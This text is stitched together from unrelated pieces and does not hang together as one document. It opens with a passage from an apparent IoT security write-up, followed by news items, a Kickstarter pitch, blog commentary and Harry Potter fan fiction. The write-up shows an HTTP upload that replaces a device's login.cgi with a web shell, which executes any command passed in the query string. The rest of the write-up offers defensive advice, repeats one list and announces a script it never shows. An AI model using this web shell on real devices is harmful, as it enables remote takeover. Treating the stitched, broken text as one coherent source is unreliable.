POST http://192.168.1.98:8181/fileupload.cgi HTTP/1.1 Content-Type: multipart/form-data; boundary=------7cf2a327f01ae User-Agent: REDACTED Host: 192.168.1.98:8181 Content-length: 482 Pragma: no-cache --------7cf2a327f01ae Content-Disposition: form-data; name="auth" 11366899 --------7cf2a327f01ae Content-Disposition: form-data; name="type" w --------7cf2a327f01ae Content-Disposition: form-data; name="file"; filename="C:\REDACTED CONFIGURATOR\output\login.cgi" #!/bin/sh echo -e "Content-type: text/html\r
\r
" echo "blaat" #echo "$QUERY_STRING" CMD="$QUERY_STRING" test2=$( echo $CMD | sed 's|[\]||g' | sed 's|%20| |g') $test2 --------7cf2a327f01ae
Now you can guess what happened next:
My advice here is to make use of existing solutions, such as package managers or, if you must roll your own, by signing your code and verifying it before installing it.
SQL/NoSQL injection
SQL injection has been known for a long time, of course injection vulnerabilities arise from not sanitizing input correctly allowing for an attacker to inject control characters into a query. We do see this coming back for a lot of the solutions, a lot of developers don't consider this to be an issue with NoSQL databases or are just not aware that this could be an issue too. My advice here is to make sure you use vetted libraries which can do proper input validation and do it consistently across your code base. I can't share any examples on this, but have a look at this article from websecurify.
Bad design and too much trust
Since there are few reference architectures available yet, we see a lot of architectures which make things easy but which may give you great exposure if a single component is breached or compromised. Furthermore we see developers consider that communication where no traditional user input is available cannot be vulnerable. In one such instance we noticed that when intercepting the communication between the gateway and the cloud there was no authentication aside from the gateway identifier (which we could easily enumerate). This resulted in us both being able to inject fake telemetery but also retrieve information on other users. Some other instances included:
Mobile applications directly logging onto a database interface (using the same password for all devices)
Security is too reliant on the network security (e.g. no encryption of communication on the local network)
MQ messages are not signed or encrypted before transfering them
Use of easily enumerable or non-revocable (e.g. date of birth and name) information as API key to identify a user's gateway
Security through obscurity: the amount of times I heard "They will never find out!"
In-house developed cryptography (none of them were cryptographers)
My advice here:
Sanitize and properly encode the information on the receiving end, this means a client shouldn't sanitize for a server and a client shouldn't expect the server to provide it sanitized information. This means that if you expect an integer, check if it is, if it's not you know something phishy is going on. In general use vetted and proven frameworks.
If the device is not hosted in your network, then treat it as hostile and don't expect any input to be correct or trustworthy, sanitize it properly.
Use proper encryption on all communication (HTTPS, encrypted MQ) and do not fail open if for instance certificates aren't valid
API keys are quite common to identify a certain gateway. Because the identifier servers as an authentication token (since a user cannot be expected to give a username and password for it to work) you need to make sure that the identifier is randomly generated using cryptographically secure RNG. I generally advice to use 128 bits as a minimum (32 characters), but considering the user only needs to submit this during set up (or if you can configure it at manufacturing time) you should preferably do it longer.
Even the most renowned cryptographers don't consider their algorithms secured unless vetted by several independant parties, and even then it sometimes goes wrong. So if you want to do cryptography, use existing algorithms and reference implementations rather than coming up with your own model.
One design I still want to discuss briefly is one that I found to be beautiful. The issue the developer wanted to tackle is one thing I haven't discussed above. A lot of times users want to use their mobile phone to control their services at home remotely. For instance turning on an aircon unit or opening a door for a cleaner. The issue with that is that your gateway is often located behind a router and not directly accessible from the Internet. Some solutions do use port forwarding, but this then also requires a dyn DNS solution and requires a lot of configuration from the user.
In general what companies do is that the mobile application will send a message to the cloud and the gateway will then fetch it from there.
The developer I spoke too didn't really like the idea that a single point had so much control. So they used the concept of signing to fix. The idea is that if you use your mobile phone to change the state of an actuator in your house, that you sign the message before posting it to the cloud. The gateway then fetches it and verifies the signature. This means that at no point compromise of a cloud platform used to relay messages could be abused to further compromise all of its gateways.
The way they did was buy coding a QR code generator which would generate a set of QR codes containing an ID to link a gateway to a user account and which also contained a private key (for the mobile phone) and its own public key. The reason the key was generated on the gateway and not the on the mobile phone was because there was no user friendly way of onboarding it onto the gateway (it didn't feature a web interface). For the purpose of a home user environment I considered it secure enough (while I still realize from a pure security perspective it might not be ideal). Whenever the user sends a control message, the message is signed, time stamped and encrypted before sending it off. The gateway would track what messages it had received before to prevent replay attacks.
One other solution I saw here, in case the cloud provider wants to know what's inside the message, was to provide a similar mechanism using HMAC and a shared secret between the gateway and the phone.
Why is IoT still going wrong?
I've engaged with a lot of developers from both large companies and small startups. The most secure solutions I saw were from a very large electronics provider and a five-man startup company. So just the size of the company doesn't mean security. I did see certain topics coming back on why vulnerabilities were present:
Start up companies often depend on business angels and external investors, they must have a working prototype as fast as possible
The focus is often on features and functionality, security comes after
Often limited experience with development and security (startups with fresh grads)
Security takes time and is sometimes hard to get right from the first time
There aren't a lot of reference architectures or standards
No budget for independant security reviews (most of the testing we do was paid by another party)
So how do you tackle something like that? Here are some key things to take care of during development:
Do proper threat modeling
The focus is often on features and functionality, security comes after
Often limited experience with development and security (startups with fresh grads)
Security takes time and is sometimes hard to get right from the first time
There aren't a lot of reference architectures or standards
No budget for independant security reviews (most of the testing we do was paid by another party)
Awareness
The issue with security conferences is that we are often not reaching the people that need it the most. Meaning those people who are not generally interested in security are not aware about it and it's them who make the mistakes. I once attended a talk by Mark Hillick from Riot Games. They were facing the same issue where developers who made security mistakes in general didn't participate in security events teaching security. To tackle this they booked in small slots at internal programming community meet ups to discuss the security issues with regard to the topics presented. It was basically a light introduction on security to get the developers more interested and aware about security. I believe we must do the same thing and make security an integral part of the IoT community conferences and meetups.
Conclusion
People have the urge to attach anything and everything to the Internet but get the security wrong quite often. Most mistakes are made due to the security objectives not being clear, lack of experience and awareness. There are a few guidelines available, but we are still at a stage were reference examples of a secure IoT architecture aren't readily available. Finally to succeed we must take security to general IoT events and not expect them to come to us, make them interested and curious about security and a positive influence on their security skills should be seen.
Below are some references in case you want to read more on IoT security or start working on your own, secure, solutions:
I also wanted to share this script which I use for doing interception of connections from an IoT gateway to the Internet through a proxy like Burp. What you need is a laptop with one connection to the internet and another one to the gateway:
The United Nations Human Rights Council on Friday passed a resolution condemning countries that prevent or disrupt access to the internet.
The 47-member U.N. council has passed two resolutions since 2012 affirming people's digital rights, but the section on internet blackouts appears to be a first.
ADVERTISEMENT
The resolution passed by consensus “Condemns unequivocally measures to intentionally prevent or disrupt access to or dissemination of information online in violation of international human rights law and calls on all States to refrain from and cease such measure.”
The digital rights group Access Now has counted at least 15 internet shutdowns around the globe in 2015, and 20 in the first half of this year.
That includes the recent reported throttling of social media sites in Turkey following the terror attack on an Istanbul airport. Others have recently been reported in Bahrain and Algeria.
“Shutdowns harm everyone and allow human rights crackdowns to happen in the dark, with impunity,” said Access Now's Deji Olukotun.
“Citizens can't participate fully in democratic discourse during elections. The Human Rights Council's principled stance is a crucial step in telling the world that shutdowns need to stop.”
The group pointed to a number of countries that attempted to “water down the text.”
The resolution is nonbinding. And in the past, experts have said these type of documents are primarily useful for public pressure.
The resolution also condemns violence or intimidation against people for “exercising their human rights and fundamental freedoms on the internet.” And it calls on countries to address security concerns online, including privacy.
As with past resolutions, the four-page document reaffirms that “the same rights that people have offline must also be protected online, in particular freedom of expression.”
It also calls on countries to help bridge the digital and gender divide, and to promote access for people with disabilities.
Baby elephant Sanook died accidentally while playing with favourite toy, Melbourne Zoo says
Updated
Sanook, the 11-month-old Asian elephant calf that became one of Melbourne Zoo's most popular animals, has died after becoming entangled in a favourite toy.
In a statement released this morning, the zoo said CCTV footage revealed Sanook's death was the result of a tragic accident.
"The CCTV footage shows that at 7pm while playing with the tyre, Sanook managed to manoeuvre it in an unusual way that caused their head to become caught," Melbourne Zoo director Kevin Tanner said in the statement.
"This placed pressure on their neck and would have prevented them from breathing. Preliminary post-mortem results confirm this as the cause of death."
Pointing out that tyres are "commonly used around the world in zoos as an approved form of enrichment for elephants", the statement said the toy was one of Sanook's favourites, as it had been for their sister Mali and brother Ongard.
However, Mr Tanner added: "To our knowledge no such accident has taken place previously in any zoo with elephants."
They said the accident has left the zoo's keepers, vets and other staff devastated.
Zoos Victoria earlier today tweeted news of the calf's death, which just yesterday had been playing energetically and suckling from their mother Num-Oi.
It is with great sadness, we announce the passing of Asian Elephant calf Sanook ow.ly/i/3ULas More details: ow.ly/rq9kj — Zoos Victoria (@ZoosVictoria) December 3, 2013
Sanook lived up to their name
Sanook's arrival was well-publicised, with more than 4,000 Victorians voting online to name the baby elephant, according to the Zoos Victoria website.
Sanook, which means fun-loving and cheerful in Thai, was the overwhelming favourite, it said.
"He is cheeky, confident and loves a bit of fun so I think Victorians have chosen their name well," Victoria's Minister for Environment and Climate Change, Ryan Smith, said at the time.
Sanook, who would have turned one in January, was the third birth since the arrival of three young elephant cows from Thailand in November 2006, as part of a new Regional Cooperative Conservation Breeding Program for the endangered species.
They weighed 131 kilograms at birth, grew quickly and remained "active and confident, just like their siblings", the website says.
Sanook's death prompted a flood of condolence messages on social media:
Topics: zoos, animals, parkville-3052
First posted
A plaque commemorating an Irish army commandant whose tactical genius saved solders' lives and was depicted in the film the Siege of Jadotville was unveiled in Co Kerry today by former Taoiseach Enda Kenny.
The late Colonel Pat Quinlan from Caherdaniel, Co Kerry, was Commandant of 'A' Company, 35th Infantry Battalion, in September 1961 when they and their men came under attack from 3,500 mercenaries and rebels at Jadotville in the state of Kantanga in the Congo.
The Irish company, comprising 158 soldiers, was part of a UN peacekeeping force in the country.
The company suffered no fatalities and inflicted heavy losses on their attackers before being forced to surrender when supplied ran out after five days.
Commandant Quinlan's action is cited in military textbooks worldwide as the best example of the use of the so-called perimeter defence.
A monument to the Caherdaniel man was due to be unveiled at Coomakista Pass but the ceremony had to be held indoors due to heavy fog.
At the unveiling, former Taoiseach Enda Kenny said the plaque, sculpted in Valentia slate by local sculptor Holger Lonze, is a fitting tribute to the leadership, courage, bravery and professionalism of the late Col Quinlan.
Jadotville veteran soldier, Noel Carey, aged 80, said today's commemoration was a very emotional day for all the survivors of Jadotville.
They said their survival was thanks to the brilliance of the late colonel.
Col Quinlan's son Leo thanked Kerry County Council who organized the commemoration and said that the monument was not just for their father, it was for all those who served with them at Jadotville.
Earlier this year it was announced that all Jadotville veterans and the next-of-kin of deceased veterans would receive a special medal recognising their bravery and courage, at a ceremony to take place this coming December in Athlone.
Last year, the 'A' Company was awarded a presidential unit citation for its collective role in the siege, 55 years after it had happened.
Richard Green flies into a rage over remarks by Peter Wallison, who declares that
Indeed, the modern era of rapid economic growth commenced after both Democratic and Republican presidents undertook to lift costly and stultifying New Deal regulations.
Green points out that growth has actually been slower since the big rightward shift circa 1980. But what they don't seem to realize is that Wallison is just following the party line. Read almost any conservative commentator on economic history, and you'll find that the era of postwar prosperity — the gigantic rise in living standards after World War II — has been expunged from the record.
You can see why: the facts are embarrassing. Here's a rough-cut version. The blue line, left scale, shows median family income in 2008 dollars; the red line, right scale, shows the top marginal tax rate, a rough indicator of the overall stance of policy. Basically, US postwar economic history falls into two parts: an era of high taxes on the rich and extensive regulation, during which living standards experienced extraordinary growth; and an era of low taxes on the rich and deregulation, during which living standards for most Americans rose fitfully at best.
Census, Tax Policy Center
This does not, to say the least, make the case for free-market orthodoxy. So a large part of the right has invented an alternative history in which the good years came after, not before, the Reagan revolution. Hey, that's what should have happened; who you gonna believe, the doctrine or your own lying eyes?
Now, here's what I know I'm going to hear in comments: stagflation! Jimmy Carter! The 70s! You can sort of see the bad years of the late 70s in the figure; it's that little downward wiggle in the middle. But that wiggle must be emphasized, lest the overwhelming success of the postwar economy be noticed.
The first prototype of a sodium-ion battery has just been revealed by the RS2E, a French network bringing together researchers and industrial actors. This technology, inspired by the lithium-ion batteries already used in portable computers and electric vehicles, could lead to the mass storage of intermittent renewable energy sources.
The announcement should cause a stir in the highly competitive world of batteries. French researchers from the RS2E network today revealed the first prototype of the sodium-ion "18650" battery, a standard format used notably in portable computers. The information may not sound exciting to non-specialists... Yet scientists across the globe, including the US, Japan, the UK, and Israel, are working on this technology—which today is considered the most serious alternative to the lithium-ion batteries that equip practically all portable electronic devices (portable computers, tablets, smartphones...)—and are beginning to take a serious look at electric vehicles. The battery used for Tesla cars, for example, is nothing more than the combination of several thousand "18650" lithium-ion batteries.
Sodium, the future of battery development! by CNRS-en
"The sodium-ion battery unveiled today is directly inspired by lithium-ion technology," explains Jean-Marie Tarascon, the French battery "guru" who is a solid-state chemist at the CNRS, and professor at the Collège de France. Like lithium ions, sodium ions "travel" from one electrode to another, during the course of charging and discharging cycles, and they do so without in any way modifying the "host materials" located at each electrode, as the latter take the form of crystalline structures the ions can smoothly enter into... Its format, called "18650," indicates that it is presented in the form of a cylinder, with a diameter of 1.8 centimeters and a height of 6.5 centimeters.
Sodium's incredible comeback
For the moment, its creators have not disclosed the composition of the materials wrapped around the two electrodes of their sodium-ion battery—a trade secret. However, the performance of the prototype presented today is better known. With 90 watt-hours/kilogram, "its energy density (the quantity of energy that can be stored per kilo of battery) is comparable to certain lithium-ion batteries, such as the Li-ion iron/phosphate battery," points out Loïc Simonin, a researcher at LITEN, a CEA laboratory associated with the development of the prototype. And its life span (maximum number of charge-discharge cycles) exceeds 2000 cycles. These initial results are thus highly encouraging, all the more so as they can be improved.
When the electric vehicle market began to develop, we feared a surge in lithium prices. Considered desirable objects today, sodium batteries have nevertheless come a long way. In the late 1980s, this technology had in fact been set aside in favor of lithium, whose superiority seemed obvious to all: thanks to a voltage of 3.5 V, lithium in theory provides the most energy. Being three times lighter than sodium ions, lithium ions also make it possible to produce very lightweight batteries, an undeniable asset when it comes to portable electronics. Lithium's only disadvantage is its (relative) rareness, and the fact that it is only found in a few specific locations (Colombia, Chile, China, etc.).
"When the electric vehicle market began to develop, we feared a surge in lithium prices, and sodium thus entered the race again,” Tarascon recalls. True enough, it has the significant advantage of being abundant (2.6% sodium can be found in the Earth's crust, compared with barely 0.06% lithium), and widely accessible, notably in seawater in the form of sodium chloride (NaCl).
In 2012, the French researcher decided to take the bull by the horns and make the most of France's know-how in sodium batteries. "For lithium, all fundamental research had been conducted in Europe, especially in France," Tarascon points out. "Yet it was in Japan that the technology was transferred and brought to market, allowing Sony to launch its first lithium-ion battery in 1991. As a result, 95% of Li-ion production today takes place in Asia." It is out of the question to repeat history. The CNRS (responsible for fundamental research) and the LITEN-CEA (in charge of technology transfer) have thus joined forces with around 15 industrial players such as Renault, Saft, and Alstom to create the RS2E network dedicated to new-generation batteries. Their stated objective is to ensure research AND development, in order to bring sodium-ion batteries to market on European soil as soon as they are ready.
A global market worth $80 billion
The commercial possibilities are indeed immense. The global market for batteries should reach 80 billion dollars in 2020, twice that of today. Too large for the time being to equip portable electronic devices, sodium-ion batteries could secure a privileged position in the electric vehicle market, as well as in the storage of intermittent renewable energies, such as wind or solar power. Energy stored during the day or in windy weather could be subsequently released using batteries (or rather series of batteries) potentially the size of a house! Another possible market is that of domestic batteries, which the founder of the Tesla car, the Californian Elon Musk, launched with much publicity in April 2015. Their "power wall," a mural battery meant to be installed in individual households, is intended to store the energy produced by solar panels fitted directly on the house's roof, as well as to regulate consumption by storing electricity during off-peak hours, when it is less expensive.
"The 18650 format enables us to provide proof of concept , and compare the performance of our batteries with those of similar format that are already available on the market. However, other formats will need to be designed to meet new requirements," explains Simonin. Time is of the essence, as Toyota are working relentlessly on a prototype of a sodium-ion car battery, while the British startup Faradion, in association with Oxford University, made a first demonstration this year of an electric bicycle powered by a sodium-ion battery.
For more on the RS2E network :
www.energie-rs2e.com/en
About
The Short Version
I want to make a book of fantasy and science fiction stories that have a hopeful feeling to them. The Kickstarter money will go to paying for the stories, the cover art, and printing the book. Please help me out! It would be a real dream come true for me if this works!
The Long Version
I want to put together a short story anthology of positive speculative fiction. I'd like the chance to create a collection of fantasy and science fiction stories that makes the reader feel better about life, the universe, and everything. I want to see hope overcoming despair, hard work paying off, and the victory of the human spirit. I want to put together a book that can cheer you up when you're having a bad day.
If my funding succeeds, I plan on having open submissions and paying professional rates for my stories.
I want to put out an anthology of other authors instead of a collection of my own work for a lot of reasons. First, I just enjoy editing. I like finding great stories in the slush pile and working with authors on rewrites.
I also think that there are a lot of voices out there that deserve to be heard. And then, there's the fact that if this works, maybe other aspiring editors will try it, and open up more markets that I can submit my fiction to.
There's a lot of bleak fiction out there right now. Dark fiction can be wonderful, but it's not what I want to read all of the time. So much of the fiction that I've seen lately focuses on humanity's problems and failures. Acknowledging those things is vital, but I think it's important to remember to celebrate our triumphs, too. So, if you've had enough bleak, angsty fiction, or if you just want a change of pace, consider funding my anthology.
Why are you doing this?
I'm passionate about fiction. I love both writing and editing. It's all I've ever wanted to do with my life. Bursts of Light is the sort of book that I would pick up if I saw it in a store, and using Kickstarter is a way to make it into reality. Thinking about the project makes me happy. That alone seems like a pretty damn good reason to try.
Because I want to see if this can work. There are a lot of projects looking for funding here, but most of the fiction that people are trying to get funding for is their own. If crowd funding can work for fiction anthologies, I think that'll do interesting things to the short fiction market. I also don't have the sort of connections that I'd need to do an anthology for a traditional publisher, and I like the thought of having creative control and being able to do this my own way.
Why should I support this project?
If you want to help another human being achieve their dream. That's kind of a big deal, if you think about it.
If you like fiction that makes you feel good.
If you like reading at all, really.
If you write short fiction. If this succeeds, it could open a floodgate of new, interesting markets. At the very least, it'll lead to one.
If you like cookies!
What's up with the cookies, anyway?
Cookies, like the stories I hope to include in Bursts of Light, are little things that make life better.
What will you use my money for?
I want to pay my authors $.05 per word, and I'd like to publish about 100,000 words. That's a pretty ambitious goal, but if I'm going to do this, I want to do it right. I also need to pay for cover art, printing costs, promotional materials, and ads. Plus, a portion of your donation will go to Kickstarter and Amazon.
Any final words to convince me?
Walt Disney said, "All of our dreams can come true if we have the courage to pursue them." That quote is a big part of my inspiration for this project. This is the most ambitious thing that I've ever attempted. I'm taking a deep breathe and making this jump. With your help, I could succeed beyond my wildest dreams. Without you, I'll fall on my face. Please, if you like the look of this project, go ahead and donate. I appreciate any help at all, and I'll do my very best not to disappoint you.
Also, I make really good cookies.
Yoo Ah In, who was recently diagnosed with a benign bone tumor, has provided more details on their recent diagnosis. However, despite the clarifications, misunderstandings have also risen due to misleading reports.
On February 16, a source from Yoo Ah In's side stated, “It is true that they received a bone tumor diagnosis. It is not malignant, but benign. There are no difficulties in their day-to-day life. We are watching their prognosis. We never said that they were “battling their illness,” and we don't know where that phrase came from.”
The source continued, saying, “Yoo Ah In's health is currently okay. Their medical condition is not severe. We hope there will be no more misunderstandings regarding their diagnosis. It is true that they have a fracture, but it is a different story from their bone tumor. There are some opinions that say the two are completely unrelated. There is nothing hugely abnormal about their health.
“Yoo Ah In is classified as someone who will be re-examined by the Military Manpower Administration and is waiting for their re-examination.  They are simply following the administration's procedures. We ask that you refrain from any broad interpretations or incorrect diagnoses.”
Meanwhile, one media source used a quote from a hospital source, saying that Yoo Ah In was diagnosed with a bone tumor and was battling an illness. Since then, rumors of Yoo Ah In “battling their disease” started to spread. However, the agency stated that they never used the phrase to describe their diagnosis.
Source (1)
The Walking Dead is still a tough act to follow, but it's definitely trailing its own heyday. Sunday's midseason finale, while avoiding another season low, brought in 25 percent fewer viewers than the comparable episode last fall.
Episode eight of the zombie drama's eighth season averaged nearly 7.9 million viewers and a 3.4 rating among adults 18-49 in live-plus-same day returns. As it stands, that's the lowest-rated finale, midseason or otherwise, since the series' second year, which aired all the way back in 2011. The most recent live score is still up a shade from the previous week's season low, which marked The Walking Dead's smallest audience in six seasons, but it's one of the clearest signs yet that the show is on the downturn.
The good news — and there is still quite a bit of it — is that the series still ranked No. 2 for Sunday night, trailing only NBC's Sunday Night Football. (The Walking Dead did, at its peak, outrate the NFL.) There's also going to be considerable time-shifting for the episode, likely buoyed by interest in a cliff-hanger.
Time-shifting has been giving The Walking Dead bigger boosts in recent seasons, as many lingering fans have opted to watch on their own schedule. The most recent episode, for example, saw its audience jump 45 percent in just three days — climbing to 10.7 million viewers.
Still, the trophy of highest-rated drama is only loosely within its grasp. Game of Thrones, by HBO's decidedly different metrics of gross viewership, easily outpaced The Walking Dead with its penultimate season in 2017. It will now be up to final live-plus-seven day averages for this recent run to determine where The Walking Dead stacks up against broadcast's highest-rated series such as NBC's This Is Us and CBS' The Big Bang Theory.
The Walking Dead will pick up its eighth season in the spring.
The last time we heard from Patriots receiver Wes Welker, they made it sound like they were going to skip the team's mandatory June minicamp. Welker changed their tune on WEEI radio in Boston Monday, hinting that they may show up for the session.
They also made it clear that they wouldn't hold out into the regular season.
"There's $9.5 million reasons why I won't miss any regular season games," Welker said.
Nothing like a Kim Etheredge callback. Well done.
Welker's agent may not love the receiver's honesty, but it hardly comes as a surprise. Welker's last contract averaged under $3 million-per-season. There's no way they would pass up the big salary associated with a franchise player. Welker hopes to get a long-term extension done, but they may sign their tender and show up to minicamp anyhow.
"We're still kinda waiting. I'd really like to be there," Welker said.
It is safe to say Welker will be there well before the real games start. Even though he's unsigned, Welker is one of the only Patriots wideouts that safely knows they have a job.
This is an article about the Beast of Gevaudan and how it impacted people around that time.
The Beast of Gevaudan is a mythical creature that was held responsible for at least 60 animal-attack deaths in the 1760s France. Some reports place the death toll over 100. However, there has been a difficulty in proving that more about 60 of the cases.
If there was a real animal behind these sightings and reports, it is obscured by a great deal of folklore. According to the locals they believed it was a werewolf, or more specifically a sorcerer who shapeshifted into a monstrous predator in order to feed on human “sarka” (=flesh). It was supposed to be bulletproof as well, until the day that someone tried a silver bullet, which since then has begun the superstition that “only a silver bullet would be able to penetrate a werewolf's skin and have them die.”
Descriptions of the Beast tend to vary so much. Most researchers believe that there had to be at least two of such creatures. If the panic wasn't causing the populace to incorporate any large animal into such sightings.
The color of the Beast's fur was especially variable. Sometimes it was considered to be fiery red with a large gray patch, or red with faint stripes along the back, just like a tiger. Other times, it had black and white patches spotted over its body, with no trace of red. Rarely, it had colors or patterns that didn't incorporate red,black or white.
If people were supposed to add all the differing description and then create a composite description out of all these characteristics that were mentioned with consistency and by the most witnesses.
The Beast is described as a quadruped about the size of a horse. It reminds witnesses as a hybrid of the following: panther, hyena, wolf and panther all at once. It has a long wolf-like or pig-like snout, lined with quite large teeth. Its ears are small and round lying close to the head. Its neck is elongated and quite strong. The tail somewhat resembles the long tail of a panther, but it is so thick and strong that the Beast uses it as a weapon, in order to knock men and animals down with like in a form of a double-edged whip and sword. Anyone that was struck by the tail reports that it would hit with considerable force. The feet of the Beast are the hardest to describe. Some would even say that it has cloven hooves, or that eagh digit is ripped with a hoof. Others say that the claws were so heavy, thick and formidable that they would merely resemble hooves.
Advertisements
Make way for the Real Househusband of New Jersey! After months of negotiations with Bravo, Joe Giudice has finally worked out a deal for a reality special focusing on them and their four daughters, Us Weekly can confirm. A source tells Us the deal is for a one hour-long special, with the possibility of additional episodes to follow.
PHOTOS: Before they were Real Housewives
Filming for the special began earlier this month. As Us Weekly reported back in April, the show will document the Real Housewives of New Jersey star's home life without wife Teresa Giudice, who's currently serving a 15-month prison sentence for fraud at the Federal Correctional Institution in Danbury, Conn. Joe, 44, has been the sole caretaker for their daughters — Gia, 14, Gabriella, 10, Milania, 9, and Audriana, 5 — since January.
PHOTOS: Former Real Housewives
Planning for the special has been ongoing. When Joe talked exclusively with Us earlier this year, they confirmed that he'd met with Bravo about the idea. "Now it's something for our attorneys to figure out," they said in April.
PHOTOS: Return to reality TV
In the meantime, Joe has had their hands full with the girls' packed schedules, which include playdates, cheer practice, and soccer tournaments, among other things.
"Days go by quick," they told Us. "They go to school, they come back, they do their homework. Who's gotta go here? Who's gotta go there?"
PHOTOS: Real Housewives' biggest fights ever
Teresa, 42, pitches in via email, but their absence is definitely felt by their kids. "They have their little breakdowns here and there," Joe admitted of their daughters. "They'll say, 'Daddy, when's they going to be out?' Or 'I miss Mommy.' I just make sure to give them lots of love and a lot of kisses."
Sign up now for the US Weekly newsletter to get breaking celebrity news, hot pics and more delivered straight to your inbox!
Want stories like these delivered straight to your phone? Download the US Weekly iPhone app now!
When the Providence Journal initially asked to see records relating to hedge fund investments by Rhode Island's pension system, they were surprised that their request was promptly granted.
But they soon found out why: the documents were heavily redacted, and much of the information journalists were looking for—manager compensation, as well as risk and investment strategies of the funds—was blacked out.
So the newspaper filed a complaint against the Attorney General's office in hopes of receiving access to the full, uncensored documents. The request was denied Thursday. From the Providence Journal:
Attorney General Peter Kilmartin's office has ruled against The Providence Journal in a long-running dispute over records related to the state pension system's investment in hedge funds. The Journal initially sought the records from General Treasurer Gina Raimondo's office. After that office provided heavily redacted documents, the newspaper appealed to Kilmartin's office. Assistant Attorney Gen. Michael Field, in a decision released last week, rejected The Journal's appeal, which focused on a section of the state's Access to Public Records law that says records presented and discussed at a public meeting are always public. Field hung their decision, in large part, on an interpretation of “the plain language and meaning of the word ‘submitted.'” The ruling stems from a complaint The Journal filed after Raimondo's office refused to make public, in full, the “due diligence reports” that the state's investment adviser, Cliffwater LLC, prepared prior to the state's investment in three hedge funds: Third Point Partners, Elliott Associates and Mason Capital.
The Providence Journal claims that the documents should legally be available under the state's Access to Public Records Act. That law states that records presented and discussed at public meetings are available to the public upon request. The Journal claims that the documents were discussed at an open meeting of the State Investment Commission. More from the Providence Journal:
The complaint stemmed from an April 14, 2013, request by then-Journal reporter Michael Stanton to the treasurer's office for investment and due-diligence reports that Cliffwater prepared and presented to the State Investment Commission, chaired by Raimondo, on 19 hedge funds. They also requested a copy of the PowerPoint presentation that the Point Judith Venture Fund II, created by a firm cofounded by Raimondo before they took office, presented to the investment commission in the lead-up to a $5-million state investment. The Journal argued that: “All of the documents Stanton requested were presented in full at public meetings of the [State Investment Commission] and are referenced in meeting minutes and tape recordings.” Raimondo's office provided heavily redacted copies of the records, asserting that the redacted portions of the records contained information deemed confidential, [proprietary] and/or trade secrets.”
The Journal released a statement that said the media, as well as citizens, have “a vital interest in knowing how the pension fund investments made by the [State Investment Commission] are performing and what those investments cost. Without access to specific information about the performance and fees of hedge funds, which make up nearly 15 percent of the portfolio, neither The Journal nor the public can evaluate those investments.”
Photo by JohnnyMrNinja via Flickr CC License
DA practice was over, and Harry and Luna were the last ones left, cleaning up the equipment. They could ask the room to vanish the targets they had been practicing aim on. The problem was it would give them completely new targets next practice, and reset the scoreboard (helpfully provided by the room with each DA member's name and number of center-circle hits on it). That had been fine when everyone had terrible aim, even with the easy color-changing charms Harry had taught first. Nobody wanted to be reminded how many times they had missed the targets last practice. Except Angelina and Katie ... Harry thought their hand-eye coordination from playing chaser translated well to aiming small bursts of light at stationary targets. Angelina and Katie had been top of the group since Harry had started the DA on aiming. But now the group was getting better about actually hitting the targets, and the DA had gotten a bit competitive.
Angelina and Katie was still top of the scoreboard. But Neville was quickly gaining and Fred and George were closing the gap, too. They had found a way to permanently color Katie's center circle for half the last practice, so their hits did not register on the magical scoreboard. Katie had yelled at the twins about dirty rotten cheaters not that this really matters anyway and you better not do stuff like this in our next match and give Madam Hooch a reason to give Gryffindor a penalty. Everyone paused to watch the fireworks, and Harry used the distraction to quietly vanish Katie's scoreboard and ask the room for a new one. But despite consistently hitting the center for the rest of practice, Katie was still slightly behind the twins when Harry called practice over. Angelina's name, with Katie's name hovering down near Neville's, had risen to the top of the scoreboard. There was a shimmering around Angelina's target, perhaps they had thought ahead and taken steps to prevent Fred and George's pranking. Or perhaps they had been tipped off. George was being slightly more friendly than they were with their other team members...
Hermione had pointedly left for the library as soon as practice ended so they didn't have to watch Ron and Lavender leaving hand-in-hand as usual. Harry had used the map to let the rest go in twos and threes, making certain the coast was clear of Inquisitorial Squad members and Slytherins in general. Luna had lingered after everyone else, chatting with Neville then helping Harry read the map.
"Can't let them go that way, Harry, Fawcett's coming. I think she's secretly a Slytherin."
"Luna, she's in Ravenclaw."
"But I never see them in the common room. And do you see them in the Gryffindor common room?"
"No"
"So that leaves Hufflepuff or Slytherin. And if she's secretly a Slytherin, we should wait until she's gone. Just in case, right, Harry?"
Smiling, they waited until Fawcett was two corridors away before sending out the next group.
Finally there was nothing left to do but clean up. So Harry and Luna were using hovering charms to move each target to the side of the Room of Requirement where they wouldn't be in the way for next practice. Harry was about a quarter of the way down the line when Luna paused, setting down their target by the wall.
"Don't you think we should do something about all the wrackspurts in here, Harry? They were really hurting Zacharias Smith's aim this practice. I saw Susan looking a little confused after they missed three in a row, too."
Halfway across the room with Terry Boot's target floating in front of him, Harry snorted. "I don't think Zacharias needs wrackspurts' help to miss the targets, Luna."
"I think everyone would really benefit from not being distracted, Harry." They frowned slightly. "And don't you say the little details are important? Wrackspurts can really hurt your concentration, you know."
"Yes..." Harry paused, concentrating on tucking Terry Boot's target safely between two other targets. Once it was deposited, they turned towards Luna. They searched for the right phrase for a moment, then tried "Wouldn't it be difficult to get rid of all of them? I won't make people stay in the Room of Requirement more than we already do. I know Malfoy's getting suspicious..."
Luna smiled, dreamy as usual but perhaps with a hint of smugness. "They are not hard to get rid of, Harry, not at all. Daddy showed me how to get rid of a wrackspurt infestation ages ago. We can do it right now, I'll show you. You just make a spiral with your wand where the wrackspurts are hovering. The incantation is incumbo." They twirled their wand slowly, exaggerating the motion. "Like this, Harry."
They still seemed dubious, but tilted their head and made a spiraling motion in the general direction of the ceiling. "Incumbo?" They raised their eyebrows at Luna, who nodded encouragingly and pointed their wand towards the corner Harry. Making an exaggerated spiral, they carefully pronounced the incantation "Incumbo." They nodded, satisfied there were no more wrackspurts left in that particular corner. "Just like that, Harry."
Harry quietly repeated "Incumbo" trying to match their emphasis, then nodded back.
They dropped their wand with a clatter to clap enthusiastically. "That's it!"
Harry turned and walked towards the next the nearest corner, repeating the incantation and waving their wand the way they had. Luna twirled to pick up their wand, then turned to take care of the other half of the room. Harry walked around the edge of the room, waving their wand a bit carelessly, while Luna worked their way slowly along their wall, swaying from side to side as they repeated each incantation carefully, enunciating each syllable. Every few steps they turned and inspected their work, making certain every inch of the crease between the ceiling and the walls was cleared. After they walked a few feet, the Room of Requirement seemed to push in on itself, trying to be helpful. Harry was a bit surprised, but Luna just turned and gaily sang a "thank you!" towards the center of the room.
